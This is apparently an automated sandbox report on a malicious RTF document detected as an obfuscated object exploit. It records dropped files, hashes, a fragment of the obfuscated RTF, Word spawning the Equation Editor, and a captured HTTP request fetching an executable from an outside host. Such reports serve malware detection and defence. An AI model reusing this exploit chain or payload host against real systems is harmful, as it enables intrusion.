    Preview:L..................F.... .....=..3....=..3.....$.)..Q.......................)....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT...user.8......QK.XhT.*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.Q...0Vk| .SECURI~1.RTF.........hT..hT..*...r.....'...............S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.T.F.-.O.b.f.s.O.b.j.D.a.t...G.e.n...1.4.0.6.1...1.7.1.1.9...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf.R.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.T.F.-.O.b.f.s.O.b.j.D.a.t...G.e.n...1.4.0.6.1...1.7.1.1.9...r.t.f.........:..,.LB.)...Ag.............
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [misc]
    Category:dropped
    Size (bytes):162
    Entropy (8bit):5.16107520570466
    Encrypted:false
    SSDEEP:3:bDuMJluscbcTahURVjSUxomxW9rbcTahURVjSUxov:bCVwTmojS6OrwTmojS6y
    MD5:5FCF0BC37C1B57FA9A878618892B01A3
    SHA1:6A671BAAFA42A8228C8010145596FAC796EE2596
    SHA-256:36D361CCB191EB864EEE1E1CF15593568DE0B386BF572A80E69D673F6CCE5EB6
    SHA-512:CD27BD42C4AE682966B1AB308862E15E6477E0472A947304CBAF6DE37B65B06399D59E1E136B00472704FA2EB086D69C4636DFC67A382609634C97B3D0AEEC7E
    Malicious:false
    Reputation:low
    Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.LNK=0..[misc]..SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
    File type:Rich Text Format data, version 1
    Entropy (8bit):4.099315387397616
    TrID:
    • Rich Text Format (5005/1) 55.56%
    • Rich Text Format (4004/1) 44.44%
    File name:SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf
    File size:3409
    MD5:815bb902aa778ff788f22db14b0053f3
    SHA1:fa03f2a12a3dfcb0661fc15d2bc7944f82b75fce
    SHA256:098cb30970dd2fc4982ffb4fad8e80ec615e677cf2756c5256c360b2c9f7f199
    SHA512:cd2a26b124527644e02a41727ac4e4e400adedf9df7a8e46772df5bd39bd82c06ce72efca67ace2775e9a3f5619baf993ad41fbe201b935ea24e7b67cfb4d9cc
    SSDEEP:96:lgv3KcettV7+NguC/KUV3xmXWVdEASXm1TcZP:K3etj7+NMyUhmSEPXJZP
    TLSH:896119F9974C8C86DB85A1F6D5523E260533FD0B4ADF44891577EDF3060B1AA4621C23
    File Content Preview:{\rtf1....{\*\alignHR789253706 \:}.{\702430601\object84247890\objocx56176213\objw7945\objh7068{\*\objdata403464{\*\aexpnd232922669 \bin0\.852343137661529059}.{\emspace776554102 \bin00000\.865859920413337107}.11792873020000000b0000006571556154696f4 \bin000
    Icon Hash:e4eea2aaa4b4b4a4
    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
    00000006Bhno

    Download Network PCAP: filteredfull

    • Total Packets: 7
    • 80 (HTTP)
    • 53 (DNS)
    TimestampSource PortDest PortSource IPDest IP
    Jan 16, 2023 07:35:38.542381048 CET4918180192.168.2.22209.59.191.114
    Jan 16, 2023 07:35:38.671264887 CET8049181209.59.191.114192.168.2.22
    Jan 16, 2023 07:35:38.671530962 CET4918180192.168.2.22209.59.191.114
    Jan 16, 2023 07:35:38.672182083 CET4918180192.168.2.22209.59.191.114
    Jan 16, 2023 07:35:38.800786018 CET8049181209.59.191.114192.168.2.22
    Jan 16, 2023 07:35:38.801532984 CET8049181209.59.191.114192.168.2.22
    Jan 16, 2023 07:35:38.801668882 CET4918180192.168.2.22209.59.191.114
    Jan 16, 2023 07:35:40.802927971 CET8049181209.59.191.114192.168.2.22
    Jan 16, 2023 07:35:40.802984953 CET4918180192.168.2.22209.59.191.114
    Jan 16, 2023 07:35:41.235943079 CET4918180192.168.2.22209.59.191.114
    TimestampSource PortDest PortSource IPDest IP
    Jan 16, 2023 07:35:38.374224901 CET5527553192.168.2.228.8.8.8
    Jan 16, 2023 07:35:38.511867046 CET53552758.8.8.8192.168.2.22
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jan 16, 2023 07:35:38.374224901 CET192.168.2.228.8.8.80xa6b1Standard query (0)barkersinn.netA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 16, 2023 07:35:38.511867046 CET8.8.8.8192.168.2.220xa6b1No error (0)barkersinn.net209.59.191.114A (IP address)IN (0x0001)false
    • barkersinn.net
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249181209.59.191.11480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampkBytes transferredDirectionData
    Jan 16, 2023 07:35:38.672182083 CET0OUTGET /wanda.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: barkersinn.net
    Connection: Keep-Alive
    Jan 16, 2023 07:35:38.801532984 CET1INHTTP/1.1 403 Forbidden
    Date: Mon, 16 Jan 2023 06:35:38 GMT
    Server: Apache
    Content-Length: 318
    Keep-Alive: timeout=2, max=500
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


    050100s020406080100

    Click to jump to process

    050100s0.002040MB

    Click to jump to process

    • File
    • Registry

    Click to dive into process behavior distribution

    Target ID:0
    Start time:07:35:20
    Start date:16/01/2023
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f7b0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:2
    Start time:07:35:21
    Start date:16/01/2023
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Target ID:5
    Start time:07:35:44
    Start date:16/01/2023
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    No disassembly